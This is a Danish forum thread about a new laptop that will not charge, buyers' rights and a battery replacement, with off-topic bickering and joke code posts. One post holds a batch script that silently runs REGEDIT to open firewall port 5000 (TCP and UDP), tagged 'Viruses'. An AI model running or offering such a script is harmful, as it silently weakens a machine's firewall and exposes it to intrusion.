Se indlæg
ny bærbar lader ikke op
|
|
Lagt på d. 17/10-2009 15:12
|
|
Begynder Antal indlæg: |
PS: ja, jeg havde problemer med mit Samsung NV40 kamera efter en tur i Thailand, hvor der var problemer med linsen, gik jeg over på min arbejdsplads til en svensk kollega, som oprettede en service, 7 dage var servicen udført, og kameraret serviceret med ny linse + lcd panel. Humlem i dettte er en kommentar til EZAL. på en måde er det lidt unfair, at noget kan "fikses" hurtigere, hvis man kender nogle som kender nogle. |
|
|
Lagt på d. 17/10-2009 15:43
|
|
ja det er rigtigt unfair.. men hvorfor ikke bruge de muligheder man har? ellers kan man jo komme til at vente i laaaang tid uanset hvad så fik jeg mit nye batteri for 3 dage siden, og det har virker perfekt lige siden warlock, jeg skriver da også først til dig, hvis der skulle ske noget med mit nye samsung tv, bare for at få råd |
|
|
sony |
Lagt på d. 17/10-2009 15:45
|
Erfarent medlem Antal indlæg: 2037 |
Ezal skrev: ja det er rigtigt unfair.. men hvorfor ikke bruge de muligheder man har? ellers kan man jo komme til at vente i laaaang tid uanset hvad så fik jeg mit nye batteri for 3 dage siden, og det har virker perfekt lige siden warlock, jeg skriver da også først til dig, hvis der skulle ske noget med mit nye samsung tv, bare for at få råd Jamen der er da aldrig noget i vejen med et samsung tv eller er der? Savner KB Fusioner er for kujoner fck står for frederiksbeg cykel klub
Fodbold vor, du som er i Valby idrætspark Hellige vorde i FREM´s navn komme dit rige, ske din vilje på banen, således også i tabellen,giv os i dag vor 3 point, thi FREM er min klub, mit hjerte & min sjæl, i al evighed Forza.!!! |
|
|
Lagt på d. 17/10-2009 15:48
|
|
selvfølgeligt er der det ellers ville warlock være arbejdsløs 4 han er, så vidt jeg har forstået, support for samsung produkter |
|
|
Lagt på d. 17/10-2009 15:49
|
|
Jo, man kan ikke stole 100% på nogen form for eletronik, uanset mærke, og den moderne værden hvor der indgår software. |
|
|
Lagt på d. 17/10-2009 15:53
|
|
Tag et eksempel, min danske håndbyggede rør forforstærker (LA C1-Gold) til 17.000Kr, den skal have skiftet rør ca, hver 2-5 år afhængig af tid man har brugt på at spille musik, det koster ca. 300-1000kr. alt efter kvalitet af rør. og jeg kunne blive ved, evt med højtaler enheder, lcd paneler, plasma paneler. osv. |
|
|
Lagt på d. 17/10-2009 15:57
|
|
Ja undskyld men dette har med intet specifike mærker at gøre men eletronik og software. |
|
|
Lagt på d. 17/10-2009 15:58
|
|
Ezal skrev: selvfølgeligt er der det ellers ville warlock være arbejdsløs 4 han er, så vidt jeg har forstået, support for samsung produkter flollet og lige gyldigt kommentar. |
|
|
Lagt på d. 17/10-2009 16:01
|
|
EZAL--> denne tråd hander om en Hp pc og købeloven. og ikke andet, at jeg arbejder for et specifik mærke har intet med denne tråd at gøre, hold dig til kærnen i emnet. |
|
|
Lagt på d. 17/10-2009 16:36
|
|
er du stiv eller hvad?? du har da selv skrevet flere indlæg om at du arbejder for samsung i DENNE TRÅD!! men nu må det ikke nævnes? syntes lige du skal tage dig sammen og læse denne tråd igennem for dine egne indlæg, du må åbenbart have glemt dem! holy shit... |
|
|
kvindemin |
Lagt på d. 17/10-2009 16:40
|
Meget øvet medlem Antal indlæg: 555 |
warlock skrev: Ja undskyld men dette har med intet specifike mærker at gøre men eletronik og software. undskyld, hvad betyder alt det her #include <iostream> using namespace std; void main() { cout << "HelloThailand!" << endl; cout << "Welcome to C++ Programming" << endl; } jeg er ikke perfekt, men faktisk så tæt på, at det skræmmer mig!!
------------------------------------------------------------ you dont pay to fuck them, you pay them to leave |
|
|
hfb |
Lagt på d. 17/10-2009 18:30
|
Meget øvet medlem Antal indlæg: 544 |
Det er en lille smule C programmering. Jeg tror også jeg vil til at putte noget intetsigende ind i mine indlæg. Μπορεί να συνεχίσετε να έχετε μια καλή μέρα! Redigeret af hfb d. 17/10-2009 18:33 |
|
|
goldwing |
Lagt på d. 17/10-2009 19:44
|
Meget øvet medlem Antal indlæg: 811 |
kvindemin skrev: warlock skrev: Ja undskyld men dette har med intet specifike mærker at gøre men eletronik og software. undskyld, hvad betyder alt det her #include <iostream> using namespace std; void main() { cout << "HelloThailand!" << endl; cout << "Welcome to C++ Programming" << endl; } Jeg gætter på der står........ SMART I EN FART.... |
|
|
sabai sabai |
Lagt på d. 17/10-2009 21:20
|
Erfarent medlem Antal indlæg: 1258 |
hfb skrev: Det er en lille smule C programmering. Jeg tror også jeg vil til at putte noget intetsigende ind i mine indlæg. Μπορεί να συνεχίσετε να έχετε μια καλή μέρα! BØH... ; @ECHO OFF ; CLS ; REGEDIT.EXE /S "%~f0" ; EXIT [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List] "5000:UDP"="5000:UDP:*:Enabled:Viruses" "5000:TCP"="5000:TCP:*:Enabled:Viruses" [img]http://s16.radikal.ru/i191/0910/9a/1cb4ead4de5d.gif[/img] is not a valid Image.
Vil man ikke åbne sine øjne , må man jo åbne sin pung ! |
|
|
Webmaster |
Lagt på d. 17/10-2009 21:36
|
Superadministrator Antal indlæg: 6782 |
Ezal skrev: Kan se at tråden nu er ved at bevæge sig en del væk fra udgangspunktet. Derfor tager vi lige det oprindelig indlæg for at friske hukommelsen op.jeg har købt en bærbar her den 2/10 (til min kone i bryllupsgave ) men så her idag vil den ikke lade op. den kører fint nok så længe stikket sidder i, men lader slet ikke. så er der jo ikke så meget bærbar over den... mit spørgsmål,som jeg håber i kan hjælpe med er: kan jeg levere den tilbage og forlange pengene tilbage eller en ny computer?? det håber jeg lidt på da meningen med den var at hun kunne tage den med hjem i starten af november, og skal den sendes ind kommer den jo ikke tilbage før lang tid efter. hvad er mine rettigheder? ville bare gerne have en ny på stedet så hun kan tage den med hjem og vise den lidt frem samt skrive lidt til mig på msn Tak. Med venlig hilsen
Webmaster Email: webmaster@dansk-thai.dk Website: www.thailand-portalen.dk Ytringsfrihed er ikke retten til at sige, hvad vi har lyst til, hvornår vi har lyst. Det er retten til at sige, hvad vi har lyst til, dér hvor vi har fået lov til det. |
|
|
Lagt på d. 17/10-2009 21:41
|
|
Webmaster kan du ikke bare lukke den? Problemet er jo løst, jeg fik et nyt batteri inden det går helt op i hat og fantasi c+ koder |
|
Spring til debat: |